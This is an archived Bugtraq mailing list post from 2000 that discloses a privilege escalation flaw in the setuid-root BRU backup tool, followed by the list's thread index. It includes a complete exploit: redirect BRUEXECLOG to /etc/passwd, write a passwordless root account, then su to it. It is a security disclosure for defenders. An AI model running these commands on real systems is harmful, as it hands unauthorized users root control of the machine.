Bugtraq mailing list archives

BRU Vulnerability

From: comsec.admin () GTE NET (root)
Date: Tue, 6 Jun 2000 14:22:24 -0700


We have found a vulnerability in BRU during our 'Security Contest' for
our company.

The details are included.


--

Riley Hassell
Network Security
Speakeasy Networks

1-206-728-9770 ext151

1-206-917-5151 Direct Line




BRU backup software Vulnerability:

        Description:
                You can change the log file BRU uses by changing the
                BRUEXECLOG environment variable. Since bru is setuid
                root you can append to any file on the system.

        Exploitation:

                $ BRUEXECLOG=/etc/passwd
                $ export BRUEXECLOG
                $ bru -V '
                > comsec::0:0::/:/bin/sh
                > '
                $ su comsec
                #

        Temporary fix:
                Why do normal users need to run bru. ;)

Current thread:

BRU Vulnerability root (Jun 06)
- Re: BRU Vulnerability Gavrie Philipson (Jun 07)
  - Re: BRU Vulnerability Jeremy Rauch (Jun 08)
    - Re: BRU Vulnerability Theo Van Dinter (Jun 11)
    - Re: BRU Vulnerability terry white (Jun 11)
    - Exploit to the overflow in restore Ronald Huizer [Crew] (Jun 14)
    - Remote DoS attack in Networks Associates PGP Certificate Server Version 2.5 Vulnerability Ussr Labs (Jun 14)
    - BEA WebLogic JSP showcode vulnerability stuart.mcclure () FOUNDSTONE COM (Jun 11)
  - Microsoft Security Bulletin (MS00-040) Microsoft Product Security (Jun 08)
  - Mission statement for LKAP(Linux Kernel Auditing Project) Bryan Paxton (Jun 08)